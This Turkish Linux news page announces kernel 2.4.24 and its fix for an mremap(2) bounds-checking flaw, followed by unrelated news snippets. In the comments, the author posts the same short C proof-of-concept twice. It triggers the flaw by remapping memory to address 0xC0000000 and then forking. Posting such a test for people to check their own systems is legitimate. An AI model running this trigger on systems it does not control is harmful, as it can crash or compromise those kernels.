Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Gnome 2.0 RC1 Çıktı!
anonim
15 Haziran 2002, 1 dakika okuma süresi

Uzun zamandan beri beklenilen, Linux'un X için en büyük 2 masaüstü yöneticisinden biri olan Gnome 2.0 Release Candinate 1'ini çıkardı (Mozilla'dan sonra bu RC'ler baydı ama ;)
Olayları geliştirme ekibinin kendi takviminde takip etmek için buraya bakabilirsiniz. Sürüm notlarına bu adresten ulaşabilirsiniz.
Bunun dışında yeni öğrendigim bir programdan da bahsedeyim. Garnome adlı program sizin için Gnome kaynak kodlarını çekip derliyor, ilgilenenlere duyurulur. Bunun dışında Deb ve Rpm kullanıcıları sabaha kalmaz unstable sürümlerine ulaşabilirler.

Slackware 8.0 çıktı
conan
1 Temmuz 2001, 1 dakika okuma süresi

Slackware'in en yeni sürümü dün piyasaya çıktı. Dağıtım XFree86 4.1.0, kernel olarak 2.2.19 ve 2.4.5, KDE 2.1.2, GNOME 1.4, glibc 2.2.3 gibi paketleri içinde barındırıyor.
Detaylı bilgi için:
Slackware sitesi
Linuxtoday

California için Linux, pardon Linus
sundance
1 Eylül 2003, 1 dakika okuma süresi

Arnold Schwarzenegger´den sonra bir başka ünlü daha California valiliği için aday olduğunu açıkladı.

Birçoklarına süpriz olan açıklamasında Linus Torvalds, böyle bir kampanyanın ne kadar zor olduğunu, ciddi finansal destekler olmadan gerçekleştirilemeyeceğini bildiğini belirterek, bir müddettir görüştüğü Open Source ile ilgili iş yapan çeşitli firmalardan 3,000,000$lık bir fon oluşturulması için gerekli desteği aldığını belirtti.

BSD´nin ana yurdu olan, gerek bilişimci gerekse aktivist dünyanın en sivri isimlerini barındıran Berkeley'nin bulundugu California eyaletinde bakalım bürokrasinin en büyük hacki gerçekleşebilecek mi ;)

Yılın Penguenleri Ödülleri için aday gösterme süreci başladı
dfisek
7 Nisan 2005, 1 dakika okuma süresi

Linux Kullanıcılari Derneği, her yıl olduğu gibi Yılın Penguenleri Ödulleri'ni veriyor. Geçen yıl olduğu gibi 6 kategoride verilecek olan ödüller, sizlerin göstereceğiniz adaylar arasından dernek üyeleri tarafından yapılacak oylama ile belirlenecek. [ Ayrıntılı Bilgi ]
Editörün notu: Şimdiden güzide editörümüz Emre "FZ" Sevinç, En Çalışkan Penguen, Fazlamesai.net televizyon programı da En İyi Basılı/Görsel İçerik Çalışması kategorilerinde aday gösterilmişler.

Gelecek Linux 2.0 çıktı
tongucyumruk
28 Eylül 2002, 1 dakika okuma süresi

Gelecek A.Ş. tarafından geliştirilen Gelecek Linux'un 2.0 sürümü geçtiğimiz günlerde sessiz sedasız çıktı. Tamamen masaüstüne yönelik olarak hazırlanmış olan dağıtımda mümkün olduğunca paketlerde sadeleştirme yapılmış. Bu sayede ilk defa Linux kuran ve X, Window Manager gibi kavramlara pek te alışık olmayan kullanıcıların daha makina açılında içinde Enlightenment, Blackbox, Window Maker gibi çince kelimeler geçen uzun bir menü ile karşılaşıp şaşırması önlenmeye çalışılmış.